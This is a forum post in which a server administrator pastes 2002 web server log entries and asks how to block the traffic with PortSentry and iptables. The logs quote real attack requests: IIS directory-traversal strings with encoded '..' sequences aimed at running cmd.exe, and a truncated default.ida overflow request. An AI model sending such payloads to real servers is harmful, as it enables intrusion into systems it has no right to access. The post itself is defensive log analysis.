Log Files

Checking my log file, I know the first one someone trying to gain access into a windows server which I get it every few days but recently the second one on 19/Dec just confused me and it contnued for a few days.

Can anyone enlighten me and how to stop/block it from accessing my server in future?. I am using Portsentery/IPtables.

Any help appreciated.


64.2.50.204 - - [01/Dec/2002:09:24:46 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:46 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:46 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:46 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:47 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:47 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:47 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:47 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:48 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
64.2.50.204 - - [01/Dec/2002:09:24:48 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
64.2.50.204 - - [01/Dec/2002:09:24:48 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
64.2.50.204 - - [01/Dec/2002:09:24:48 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -

----------------------------------------------------------------------

213.30.140.52 - - [19/Dec/2002:04:00:47 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

 

 

 

 

Top